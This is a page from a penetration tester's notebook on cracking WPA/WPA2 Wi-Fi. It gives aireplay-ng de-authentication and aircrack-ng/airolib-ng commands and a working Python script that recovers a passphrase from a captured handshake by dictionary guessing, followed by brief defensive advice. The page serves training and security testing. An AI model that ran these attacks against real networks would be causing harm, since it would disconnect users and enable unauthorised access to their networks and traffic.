refabr1k's Pentest Notebook
WPA/WPA2 Attacks

Start airmon-ng and airodump-ng, and write the airodump-ng capture to <airodump-output.cap>

1. De-authentication attack

A de-authentication attack knocks the client off the Wi-Fi; when it attempts to reconnect, the 4-way handshake is captured. aircrack-ng can then use that handshake to find the password with a dictionary attack.

aireplay-ng -0 1 -a <AP-mac-addr> -c <Victim-mac-addr> mon0

When the client reconnects, the top right of the airodump-ng screen indicates that the handshake has been captured.

To check the packet contents with Wireshark, open <output.cap> and filter on "EAPOL" to observe the captured 4-way handshake.

wireshark <output.cap>

2. Aircrack-ng to discover WPA password

aircrack-ng -0 -w <wordlist> <airodump-output.cap>

Airolib-ng - creating PMK database for faster cracking

# add my ESSID to a text file
echo WIFU > essid.txt

# create the PMK database and import the ESSID
airolib-ng my_password_db --import essid essid.txt

# shows 0 passwords at this point
airolib-ng my_password_db --stats

# import the password list into the database
airolib-ng my_password_db --import passwd /usr/share/wordlists/myWordl.txt

# batch-calculate the PMKs
airolib-ng my_password_db --batch

Info: How WPA passwords are "cracked"?

Two things are needed to crack a WPA password: (1) the handshake and (2) a wordlist.

In short, the handshake is made up of the password plus the following "ingredients":

  • AP Address

  • STA Address

  • AP Nonce

  • STA Nonce

  • EAPOL

  • Payload

Together these generate a MIC (Message Integrity Code). This value changes if any of the "ingredients", including the password, change.

To crack the password, the attack takes each word from the wordlist we provide, "cooks" it with the ingredients, and checks whether the resulting MIC matches the one produced with the rightful password.
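The "cooking" described above, written out in Python as an added example (not the notebook's own code, and not aircrack-ng's): PBKDF2 turns passphrase + ESSID into the PMK (the step airolib-ng precomputes, since it depends on nothing else), the 802.11i PRF mixes in both MAC addresses and both nonces to get the PTK, and an HMAC over the EAPOL frame with the PTK's first 16 bytes gives the MIC that is compared against the captured one. The MAC addresses, nonces, EAPOL frame and wordlist are constructed sample values, and the MIC uses the WPA2 (key descriptor version 2, HMAC-SHA1) variant; the "password"/"IEEE" PMK vector from the 802.11i standard is used as a sanity check.

```python
import hashlib
import hmac

def pmk_from_passphrase(passphrase: str, essid: str) -> bytes:
    # PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes).
    # Only the ESSID and passphrase go in, so it can be precomputed per ESSID (airolib-ng).
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)

def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce) -> bytes:
    # PRF-512 (802.11i): HMAC-SHA1 over label, both MACs and both nonces (each pair
    # ordered low/high), with a counter byte appended; first 64 bytes are the PTK.
    data = (b"Pairwise key expansion\x00" + min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return b"".join(hmac.new(pmk, data + bytes([i]), hashlib.sha1).digest()
                    for i in range(4))[:64]

def eapol_mic(ptk: bytes, eapol_mic_zeroed: bytes) -> bytes:
    # KCK = first 16 bytes of PTK; WPA2 (key descriptor v2) MIC = HMAC-SHA1 truncated to 16.
    return hmac.new(ptk[:16], eapol_mic_zeroed, hashlib.sha1).digest()[:16]

def recover_passphrase(wordlist, essid, ap_mac, sta_mac, anonce, snonce,
                       eapol_mic_zeroed, captured_mic):
    # The per-word check described above: derive PMK -> PTK -> MIC and compare.
    for word in wordlist:
        ptk = ptk_from_pmk(pmk_from_passphrase(word, essid), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk, eapol_mic_zeroed), captured_mic):
            return word
    return None

# Constructed handshake "ingredients" (not a real capture): MACs, nonces and the
# EAPOL message 2 frame with its 16-byte MIC field (offset 81) set to zero.
ESSID = "WIFU"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
EAPOL_MIC_ZEROED = (bytes.fromhex("0103005f02010a00000000000000000001")  # hdr, type, key info, len, replay
                    + SNONCE + bytes(32) + bytes(16) + bytes(2))        # IV+RSC+ID, MIC=0, key data len
TRUE_PASSPHRASE = "correct horse"  # constructed; used only to produce the sample MIC
CAPTURED_MIC = eapol_mic(ptk_from_pmk(pmk_from_passphrase(TRUE_PASSPHRASE, ESSID),
                                      AP_MAC, STA_MAC, ANONCE, SNONCE), EAPOL_MIC_ZEROED)
WORDLIST = ["password", "letmein", "WIFU1234", "correct horse"]

if __name__ == "__main__":
    print(recover_passphrase(WORDLIST, ESSID, AP_MAC, STA_MAC, ANONCE, SNONCE,
                             EAPOL_MIC_ZEROED, CAPTURED_MIC))
```

The 4096 PBKDF2 iterations are the expensive part of every guess, which is why a long, non-dictionary passphrase and a non-default ESSID (defeating precomputed PMK tables) are the practical defences.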

Last updated 4 years ago